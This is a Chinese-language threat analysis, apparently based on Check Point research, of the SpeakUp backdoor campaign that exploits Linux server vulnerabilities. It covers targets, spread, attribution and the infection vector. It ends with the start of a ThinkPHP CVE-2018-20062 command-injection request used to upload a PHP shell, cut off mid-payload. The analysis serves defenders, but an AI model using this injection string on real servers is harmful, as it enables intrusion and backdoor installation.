样本 SpeakUp PHP,SpeakUp 木马技术分析
Check Point 研究人员近期发现一个新的利用 Linux 服务器漏洞来植入新后门木马的攻击活动。
这起攻击活动利用 6 个不同 Linux 发行版中已知漏洞的木马漏洞活动被命名为 SpeakUp。
攻击活动的目标为包括 AWS 主机在内的世界范围内的服务器。
Check Point 研究人员发现这起利用 Linux 服务器漏洞来植入新后门的攻击活动可以绕过所有的安全产品。植入的后门被命名为 SpeakUp,是以其中的一个 C2 服务器名字来命名的,该木马可以利用 6 个不同的 Linux 发布版中的已知漏洞。攻击的主要目标为东亚和拉美地区的 Linux 服务器,包括位于 ASW 上的主机。
SpeakUp 可以利用远程代码执行漏洞在受感染的主机所在的内网中进行传播,并超过新的 IP 范围。除此之外,SpeakUp 还可以用未检测到的木马感染 Mac 设备。
截止目前,还不能完全确定背后的攻击者。但研究人员根据该攻击活动与其他恶意软件的一些共同点将 SpeakUp 与 Zettabit 的开发者进行了关联。
图 1: SpeakUp 受害者分布
图 2: SpeakUp 的增长率(每天)
感染向量
最开始的感染向量是 thinkphp 的一个漏洞,使用命令注入技术来上传 PHP 脚本来服务和执行 Perl 后门。
漏洞利用一共分为 3 个步骤:
1、利用 CVE-2018-20062 来上传 PHP shell
使用 GET 请求,将 ThinkPHP ( CVE-2018-20062 ) 的远程代码执行漏洞发送到目标服务器:
s=/index/thinkapp/invokefunction&function=call_user_func_array&vars [ 0 ] =system&vars [ 1 ] [ ] =echo ^